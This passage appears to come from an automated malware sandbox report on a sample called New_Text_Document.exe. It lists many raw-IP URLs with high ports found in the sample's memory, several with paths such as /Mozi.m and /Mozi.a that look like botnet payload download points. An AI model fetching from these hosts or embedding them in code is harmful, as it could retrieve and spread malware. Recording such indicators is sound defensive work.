                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.116.206.186:9045/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.124.219.3:43132/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.124.219.3:43132/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.124.219.3:43132/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.131.101.80:17318/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.131.41.175:1411/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.131.84.65:33117/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.131.93.16:32809/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.141.111.118:33733/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.151.143.2:21623/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.162.123.80:5439/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.19.183.14:6116/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.219.38.228:23053/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.222.252.130:6156/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.34.177.78:34414/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.48.47.124:53560/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.75.6.127:19698/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.115.172.106:4096/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.176.180.12:50747/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.176.217.25:35542/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.176.41.131:30008/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.177.105.202:46558/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.177.105.243:49470/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.177.214.181:7824/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.177.64.24:36180/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.214.189.213:21150/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.218.165.148:58533/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.218.166.63:42458/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.218.212.209:35645/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.218.230.159:27287/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.218.6.191:12808/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.72.148.38:2482/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.100.122:30581/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.137.29:32770/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.177.162:26290/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.13.133.18:54825/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.13.199.58:5931/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.170.240.209:7839/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.212.82:6699/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.66.85:5490/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.125.58:54012/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.224.242.131:59072/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.49.47.190:46516/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.73.182.234:16707/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.116.231.49:54479/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.117.29.193:38166/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.117.31.94:56151/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.117.79.95:43445/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.120.61.85:45532/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.122.217.187:45895/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.126.81.55:37746/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.127.213.173:39093/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.155.225.229:5522/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.155.80.34:9709/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.18.235.96:22053/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.216.221.251:52881/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.235.147.107:22649/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.235.250.223:52523/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.240.38.177:7684/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.253.205.235:8600/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.52.51.239/scripts/23
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.52.51.239/scripts/23s
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://182.59.133.14:37378/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.100.12.213:2663/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.100.185.149:24843/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.106.162.52:33687/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.106.241.146:55013/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.106.244.204:44258/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.107.219.135:28253/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.108.66.143:4771/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.109.144.84:47003/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.109.166.11:38435/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.109.169.45:23188/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://183.250.179.58:19026/.i
